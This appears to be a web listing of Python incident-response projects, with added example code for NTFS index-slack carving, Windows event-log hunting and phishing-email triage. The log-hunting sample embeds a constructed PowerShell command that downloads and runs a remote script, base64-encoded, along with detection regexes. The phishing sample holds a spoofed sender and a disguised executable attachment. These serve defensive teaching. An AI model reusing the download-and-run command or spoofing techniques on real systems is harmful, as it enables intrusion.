Python incident-response

Open-source Python projects categorized as incident-response

Top 22 Python incident-response Projects

  • IntelOwl

    Intel Owl: analyze files, domains, IPs in multiple ways from a single API at scale

    Project mention: To GSoC and beyond... | | 2022-09-26

    Allowed bulk analysis of files as well as observables, leading to a more efficient workflow for IntelOwl users. #1032

  • volatility3

    Volatility 3.0 development

    Project mention: Volatility 3 2.4.1 - New Linux and Windows plugins | | 2023-04-22

  • beagle

    Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs. (by yampelo)

  • Bashfuscator

    A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.

    Project mention: Please be gentle | | 2022-09-15

    Try and figure out what this does... I used a tool I wrote years ago called Bashfuscator to create it:

  • Incident-Playbook

    GOAL: Incident Response Playbooks Mapped to MITRE Attack Tactics and Techniques. [Contributors Friendly]

    Project mention: Cyber Playbooks | | 2022-06-29
  • APT-Hunter

    APT-Hunter is a threat hunting tool for Windows event logs, built with a purple-team mindset to detect APT movements hidden in the sea of Windows event logs and to cut the time needed to uncover suspicious activity.

    Project mention: APT-Hunter: a threat hunting tool for Windows event logs, built with a purple-team mindset to detect APT movements hidden in the sea of Windows event logs and to cut the time needed to uncover suspicious activity | | 2023-05-07
  • ThePhish

    ThePhish: an automated phishing email analysis tool

    Project mention: How do you deal with phishing emails at your company? | | 2023-05-14

  • intelmq

    IntelMQ is a solution for IT security teams for collecting and processing security feeds using a message queuing protocol.

  • CyberThreatHunting

    A collection of resources for Threat Hunters - Sponsored by Falcon Guard

  • Watcher

    Watcher - Open Source Cybersecurity Threat Hunting Platform. Developed with Django & React JS. (by Felix83000)

  • atc-react

    A knowledge base of actionable Incident Response techniques

    Project mention: Mitre deTTECT | | 2023-03-31

    Does anyone know something similar to MITRE ATT&CK for incident response? I found this: it looks good but seems pretty dead :?

  • dfirtrack

    DFIRTrack - The Incident Response Tracking Application

    Project mention: Report tips and note taking tips | | 2023-03-21

    DFIRTrack - IR tracking application

  • TheHiveDocs

    Documentation of TheHive

  • misp-taxonomies

    Taxonomies used in the MISP taxonomy system; they can also be used by other information-sharing tools.

    Project mention: Licensing API response data | | 2022-06-20

    Some repositories are licensed without having any code: Example with datasets: Example with md documentation:

  • TheHive4py

    Python API Client for TheHive

    Project mention: ThePhish: an automated phishing email analysis tool - A new version will come when the Python API for TheHive 5 becomes stable, so stay tuned! | | 2023-04-22

    Waiting for these guys to complete the API and related documentation:

  • assisted-log-enabler-for-aws

    Assisted Log Enabler for AWS - Find AWS resources that are not logging, and turn them on.

  • kc7

    A cybersecurity game in Azure Data Explorer

    Project mention: Kc7 – A cybersecurity game in Azure Data Explorer | | 2022-09-26
  • evtx-hunter

    evtx-hunter helps to quickly spot interesting security-related activity in Windows Event Viewer (EVTX) files.

  • mediator

    An extensible, end-to-end encrypted reverse shell that works across networks without port forwarding. (by lawndoc)

  • aws-incident-response-playbooks-workshop

    Project mention: Playbook/Guide for responding to specific incident | | 2023-05-02

  • INDXRipper

    Carve file metadata from NTFS index ($I30) attributes

  • Simple-Live-Data-Collection

    Simple Live Data Collection Tool
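INDXRipper's technique deserves a closer look. The $I30 attribute is a directory's B-tree index of FILE_NAME records; when a file is deleted or renamed, the index node is rewritten with fewer entries, but the old bytes past the new end-of-node marker stay in the 4 KiB INDEX_ALLOCATION block as slack until they are overwritten. Carving that slack recovers names, sizes, parent MFT references and all four FILE_NAME timestamps for files that no longer exist, and because timestomping tools usually only touch $STANDARD_INFORMATION, the FILE_NAME timestamps found here are also a useful cross-check. The following Python is an added example written for this page, not INDXRipper's own code: it builds a constructed INDX block (two live files and one deleted entry planted in slack), undoes the update-sequence fixups that NTFS writes into the last two bytes of every 512-byte sector, walks the live entries, then scans the slack at every 8-byte boundary for anything that still passes FILE_NAME sanity checks. All names, MFT record numbers and timestamps in the sample are made up; INDEX_ROOT entries stored inside the MFT record and the volume traversal needed to locate the blocks are out of scope here.

```python
import struct
from datetime import datetime, timedelta, timezone

SECTOR, INDX_MAGIC, NODE_HDR = 512, b"INDX", 0x18          # node header follows the 24-byte INDX header
ENTRY_HDR_LEN, FN_FIXED_LEN, FLAG_LAST = 0x10, 0x42, 0x02  # entry header, FILE_NAME fixed part, terminator
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_dt(ft):
    return EPOCH_1601 + timedelta(microseconds=ft // 10)

def dt_to_filetime(dt):
    d = dt - EPOCH_1601                                      # integer maths; floats lose precision here
    return ((d.days * 86400 + d.seconds) * 1_000_000 + d.microseconds) * 10

# ---- builders for the constructed sample block (not data from a real volume) ----
def build_file_name(parent_ref, name, created, modified, real_size):
    ft_c, ft_m = dt_to_filetime(created), dt_to_filetime(modified)
    # parent ref; created/modified/MFT-changed/accessed; allocated and real size; flags; reparse; name len; namespace
    return struct.pack("<QQQQQQQIIBB", parent_ref, ft_c, ft_m, ft_m, ft_m, (real_size + 4095) // 4096 * 4096,
                       real_size, 0x20, 0, len(name), 1) + name.encode("utf-16-le")

def build_index_entry(file_ref, fn_attr=b"", flags=0):
    body = ENTRY_HDR_LEN + len(fn_attr)
    entry_len = (body + 7) & ~7                              # entries are 8-byte aligned
    return struct.pack("<QHHI", file_ref, entry_len, len(fn_attr), flags) + fn_attr + bytes(entry_len - body)

def build_indx_block(live, slack, vcn=0, usn=0x0005, block_size=4096):
    usa_count = 1 + block_size // SECTOR                     # USN word + one saved word per sector
    entries_start = (0x28 + 2 * usa_count + 7) & ~7          # entries begin after the update sequence array
    live_bytes = b"".join(live) + build_index_entry(0, b"", FLAG_LAST)
    block = bytearray(block_size)
    block[:NODE_HDR] = INDX_MAGIC + struct.pack("<HHQQ", 0x28, usa_count, 0x1234, vcn)
    block[NODE_HDR:NODE_HDR + 16] = struct.pack("<IIII", entries_start - NODE_HDR,
                                                entries_start - NODE_HDR + len(live_bytes), block_size - NODE_HDR, 0)
    block[entries_start:entries_start + len(live_bytes)] = live_bytes
    slack_bytes, pos = b"".join(slack), entries_start + len(live_bytes)
    block[pos:pos + len(slack_bytes)] = slack_bytes          # what an earlier, fuller node left behind
    block[0x28:0x2A] = struct.pack("<H", usn)                # apply fixups the way NTFS does on write
    for i in range(block_size // SECTOR):
        tail = SECTOR * (i + 1) - 2
        block[0x2A + 2 * i:0x2C + 2 * i] = block[tail:tail + 2]
        block[tail:tail + 2] = struct.pack("<H", usn)
    return bytes(block)

def undo_fixups(raw):
    if raw[:4] != INDX_MAGIC:
        raise ValueError("not an INDX block")
    usa_off, usa_count = struct.unpack_from("<HH", raw, 4)
    usn, buf = raw[usa_off:usa_off + 2], bytearray(raw)
    for i in range(usa_count - 1):
        tail = SECTOR * (i + 1) - 2
        if buf[tail:tail + 2] != usn:                        # torn write, or the carve boundary is wrong
            raise ValueError(f"fixup mismatch in sector {i}")
        buf[tail:tail + 2] = raw[usa_off + 2 + 2 * i:usa_off + 4 + 2 * i]
    return bytes(buf)

def parse_file_name(fn):
    if len(fn) < FN_FIXED_LEN:
        return None
    parent, ct, mt, _, at, _, real, _, _, name_len, ns = struct.unpack_from("<QQQQQQQIIBB", fn)
    if name_len == 0 or ns > 3 or len(fn) < FN_FIXED_LEN + 2 * name_len:
        return None                                          # fails basic FILE_NAME sanity checks
    try:
        name = fn[FN_FIXED_LEN:FN_FIXED_LEN + 2 * name_len].decode("utf-16-le")
    except UnicodeDecodeError:
        return None
    return {"name": name, "parent_mft": parent & 0xFFFFFFFFFFFF, "size": real,
            "created": filetime_to_dt(ct), "modified": filetime_to_dt(mt), "accessed": filetime_to_dt(at)}

def scan(block, off, end, live):
    """Live mode walks consecutive entries up to the terminator; slack mode retries at every 8-byte boundary."""
    while off + ENTRY_HDR_LEN <= end:
        file_ref, entry_len, fn_len, flags = struct.unpack_from("<QHHI", block, off)
        ok = ENTRY_HDR_LEN <= entry_len <= end - off and not entry_len & 7 and fn_len <= entry_len - ENTRY_HDR_LEN
        if live and (not ok or flags & FLAG_LAST):
            return
        rec = parse_file_name(block[off + ENTRY_HDR_LEN:off + ENTRY_HDR_LEN + fn_len]) if ok and fn_len else None
        if rec:
            yield dict(rec, mft=file_ref & 0xFFFFFFFFFFFF, seq=file_ref >> 48, slack=not live)
        off += entry_len if live or rec else 8

def parse_indx_block(raw):
    block = undo_fixups(raw)
    entries_off, entries_size, alloc_size, _ = struct.unpack_from("<IIII", block, NODE_HDR)
    end_live, end_node = NODE_HDR + entries_size, NODE_HDR + alloc_size
    return list(scan(block, NODE_HDR + entries_off, end_live, True)) + list(scan(block, end_live, end_node, False))

def demo_block():
    """Constructed sample: two live files plus one deleted file's entry lingering in slack."""
    t = datetime(2023, 5, 1, 12, 0, tzinfo=timezone.utc)
    root = (5 << 48) | 5                                     # parent = root directory (MFT record 5, seq 5)
    live = [build_index_entry((1 << 48) | 0x40, build_file_name(root, "notes.txt", t, t, 1234)),
            build_index_entry((1 << 48) | 0x41, build_file_name(root, "report.docx", t, t, 98304))]
    slack = [build_index_entry((3 << 48) | 0x42, build_file_name(root, "dropper.exe", t, t, 51200))]
    return build_indx_block(live, slack)

if __name__ == "__main__":
    print(*parse_indx_block(demo_block()), sep="\n")
```

Running it lists notes.txt and report.docx as live entries and dropper.exe, which no longer exists in the directory, as a slack hit with its original MFT record number, sequence number and timestamps. On real evidence, the fixup check is what tells you a carved 4 KiB chunk really is one INDX block rather than a misaligned read, and the sequence number lets you tell whether the MFT record has since been reused for another file.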


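APT-Hunter and evtx-hunter both sift Windows event logs for attacker activity, and beagle turns such logs into process graphs. The added example below (written for this page; none of it comes from those projects) shows the core of both ideas on constructed Security 4688 process-creation records in the flat shape EVTX-to-JSON exporters produce. It uses the event's real field names (NewProcessId for the child, ProcessId for the creator, ParentProcessName, CommandLine) to link each process to its creator, walks the ancestry chain, and applies three hunting rules: an Office application somewhere above a shell or script host, a PowerShell -EncodedCommand payload (decoded from base64 UTF-16LE), and an executable launched from a user-writable directory. The payload, PIDs, user and timestamps are made up. Two caveats the code handles: PIDs are reused, so creator lookups are done in time order and cross-checked against ParentProcessName (present on Windows 10 / Server 2016 and later), and chains end at the first ancestor that started before logging began. Command lines only appear in 4688 when "Include command line in process creation events" is enabled; without it the encoded-command rule has nothing to match.

```python
import base64
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common spellings are covered here.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
WRITABLE_RE = re.compile(r"(?i)\\(?:users\\[^\\]+\\appdata\\local\\temp|users\\public|windows\\temp|programdata)\\")

# Constructed sample records in the flat shape evtx-to-JSON exporters produce. Field names follow the 4688
# schema: NewProcessId is the child, ProcessId is the creator's PID, ParentProcessName its image (Win10+).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/stage2.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
EVENTS = [
    {"EventID": 4688, "TimeCreated": "2023-05-14T09:11:50Z", "SubjectUserName": "SYSTEM", "NewProcessId": "0x0a18",
     "NewProcessName": r"C:\Windows\System32\svchost.exe", "ProcessId": "0x02fc",
     "ParentProcessName": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"EventID": 4688, "TimeCreated": "2023-05-14T09:12:01Z", "SubjectUserName": "jdoe", "NewProcessId": "0x1a4c",
     "NewProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "ProcessId": "0x0f30",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": r'"WINWORD.EXE" /n "C:\Users\jdoe\Downloads\invoice.docm"'},
    {"EventID": 4688, "TimeCreated": "2023-05-14T09:12:07Z", "SubjectUserName": "jdoe", "NewProcessId": "0x2b10",
     "NewProcessName": r"C:\Windows\System32\cmd.exe", "ProcessId": "0x1a4c",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"cmd.exe /c powershell -nop -w hidden -enc {ENC}"},
    {"EventID": 4688, "TimeCreated": "2023-05-14T09:12:08Z", "SubjectUserName": "jdoe", "NewProcessId": "0x2b44",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ProcessId": "0x2b10",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe", "CommandLine": f"powershell -nop -w hidden -enc {ENC}"},
    {"EventID": 4688, "TimeCreated": "2023-05-14T09:12:15Z", "SubjectUserName": "jdoe", "NewProcessId": "0x2c00",
     "NewProcessName": r"C:\Users\jdoe\AppData\Local\Temp\update.exe", "ProcessId": "0x2b44",
     "ParentProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "update.exe"},
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def index_by_pid(events):
    """Map each new PID to its 4688 event. PIDs get reused, so process in time order and let the latest win."""
    by_pid = {}
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev.get("EventID") == 4688:
            by_pid[ev["NewProcessId"]] = ev
    return by_pid

def ancestry(ev, by_pid):
    """Image names from the process up to the oldest ancestor visible, e.g. ['cmd.exe', 'winword.exe', ...]."""
    chain, seen, cur = [basename(ev["NewProcessName"])], {ev["NewProcessId"]}, ev
    while True:
        parent, expected = by_pid.get(cur["ProcessId"]), cur.get("ParentProcessName", "")
        # Stop when the creator started before logging began, when its PID was reused by a different image
        # (cross-checked against ParentProcessName), or when the links loop.
        if parent is None or parent["NewProcessId"] in seen or \
                (expected and basename(parent["NewProcessName"]) != basename(expected)):
            if expected:
                chain.append(basename(expected))
            return chain
        seen.add(parent["NewProcessId"])
        chain.append(basename(parent["NewProcessName"]))
        cur = parent

def decode_encoded_command(cmdline):
    m = ENC_RE.search(cmdline or "")
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")   # -EncodedCommand is base64 of UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None

def hunt(events):
    """Return (rule, NewProcessId, detail) findings."""
    by_pid, findings = index_by_pid(events), []
    for ev in by_pid.values():
        name, chain = basename(ev["NewProcessName"]), ancestry(ev, by_pid)
        if name in SHELLS and OFFICE & set(chain[1:]):
            findings.append(("office_spawned_shell", ev["NewProcessId"], " <- ".join(chain)))
        decoded = decode_encoded_command(ev.get("CommandLine"))
        if decoded:
            findings.append(("encoded_powershell", ev["NewProcessId"], decoded))
        if WRITABLE_RE.search(ev["NewProcessName"]):
            findings.append(("exec_from_writable_dir", ev["NewProcessId"], " <- ".join(chain)))
    return findings

if __name__ == "__main__":
    for rule, pid, detail in hunt(EVENTS):
        print(f"[{rule}] pid={pid}: {detail}")
```

The ancestry string is the part worth keeping in a case file: "update.exe <- powershell.exe <- cmd.exe <- winword.exe <- explorer.exe" says more about what happened than any single event does, and the decoded payload gives the next pivot (the download URL) without opening a PowerShell console.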

NOTE: The open source projects on this list are ordered by number of GitHub stars. The number of mentions indicates repo mentions in the last 12 months or since we started tracking (Dec 2020). The latest post mention was on 2023-05-14.
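ThePhish automates the analysis of reported phishing e-mails by pulling observables out of the message and handing them to TheHive, Cortex and MISP. The added example below is a stand-alone first pass written for this page, not ThePhish's code: given a raw RFC 5322 message it extracts the sender, Reply-To and Authentication-Results verdicts, the URLs in the body and the SHA-256 of every attachment, and flags the classic tells: an address-looking display name on a different domain from the real sender, an off-domain Reply-To, SPF/DKIM/DMARC not passing, link text that shows one URL while the href points elsewhere, and risky or double-extension attachments. The message is constructed for this example (the domains and the 203.0.113.7 address are documentation values). The hashes and URLs it returns are the observables you would then enrich or block.

```python
import hashlib
import re
from email import message_from_bytes, policy
from email.utils import parseaddr

RISKY_EXT = {".exe", ".scr", ".js", ".vbs", ".hta", ".lnk", ".iso", ".docm", ".xlsm", ".one"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
ANCHOR_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.I)

# Constructed sample message: spoofed display name, off-domain Reply-To, failed SPF/DMARC,
# a link whose visible text differs from its target, and a double-extension attachment.
SAMPLE_EML = b"""From: "it@corp.example" <alerts@corp-example-login.com>
Reply-To: helpdesk@mail-relay.example.net
To: jdoe@corp.example
Subject: Your password expires today
Authentication-Results: mx.corp.example; spf=fail smtp.mailfrom=corp-example-login.com; dkim=none; dmarc=fail header.from=corp-example-login.com
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset=utf-8

<p>Reset it here: <a href="http://203.0.113.7/reset">https://sso.corp.example/reset</a></p>
--b1
Content-Type: application/octet-stream; name="invoice.pdf.exe"
Content-Disposition: attachment; filename="invoice.pdf.exe"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AAA==
--b1--
"""

def domain_of(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""

def triage(raw):
    """Extract observables and red flags from a raw message; returns a dict ready for enrichment."""
    msg = message_from_bytes(raw, policy=policy.default)
    display, sender = parseaddr(str(msg.get("From", "")))
    _, reply_to = parseaddr(str(msg.get("Reply-To", "")))
    auth = {k.lower(): v.lower() for k, v in AUTH_RE.findall(str(msg.get("Authentication-Results", "")))}
    flags, urls, attachments = [], [], []
    spoof = re.search(r"[\w.+-]+@([\w.-]+)", display)          # address-looking display name on another domain
    if spoof and spoof.group(1).lower() != domain_of(sender):
        flags.append(f"display name claims {spoof.group(1)} but sender is {domain_of(sender)}")
    if reply_to and domain_of(reply_to) != domain_of(sender):
        flags.append(f"reply-to domain {domain_of(reply_to)} differs from sender {domain_of(sender)}")
    flags += [f"{k}={auth.get(k, 'missing')}" for k in ("spf", "dkim", "dmarc") if auth.get(k) != "pass"]
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html") and not part.is_attachment():
            body = part.get_content()
            for href, text in ANCHOR_RE.findall(body):
                visible = re.sub(r"<[^>]+>", "", text).strip()
                if URL_RE.fullmatch(visible) and visible != href:   # hover-vs-target mismatch
                    flags.append(f"link text {visible} hides {href}")
            urls += URL_RE.findall(body)
    for part in msg.iter_attachments():
        name, data = part.get_filename() or "", part.get_content()
        data = data if isinstance(data, bytes) else str(data).encode()
        attachments.append({"name": name, "size": len(data), "sha256": hashlib.sha256(data).hexdigest()})
        pieces = name.lower().split(".")
        if len(pieces) > 1 and "." + pieces[-1] in RISKY_EXT:
            flags.append(f"risky attachment {name}" + (" (double extension)" if len(pieces) > 2 else ""))
    return {"from": sender, "reply_to": reply_to, "auth": auth, "urls": sorted(set(urls)),
            "attachments": attachments, "flags": flags}

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_EML), indent=2))
```

Authentication-Results is only trustworthy when your own MX wrote it; an attacker can include a forged header upstream, so a production triage step should use the header stamped by the receiving server (the authserv-id, mx.corp.example in the sample) and ignore others.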

What are some of the best open-source incident-response projects in Python? This list will help you:

Project Stars
1 IntelOwl 2,767
2 volatility3 1,536
3 beagle 1,209
4 Bashfuscator 1,159
5 Incident-Playbook 1,060
6 APT-Hunter 948
7 ThePhish 885
8 intelmq 824
9 CyberThreatHunting 717
10 Watcher 714
11 atc-react 521
12 dfirtrack 424
13 TheHiveDocs 385
14 misp-taxonomies 229
15 TheHive4py 193
16 assisted-log-enabler-for-aws 171
17 kc7 137
18 evtx-hunter 123
19 mediator 91
20 aws-incident-response-playbooks-workshop 39
21 INDXRipper 37
22 Simple-Live-Data-Collection 21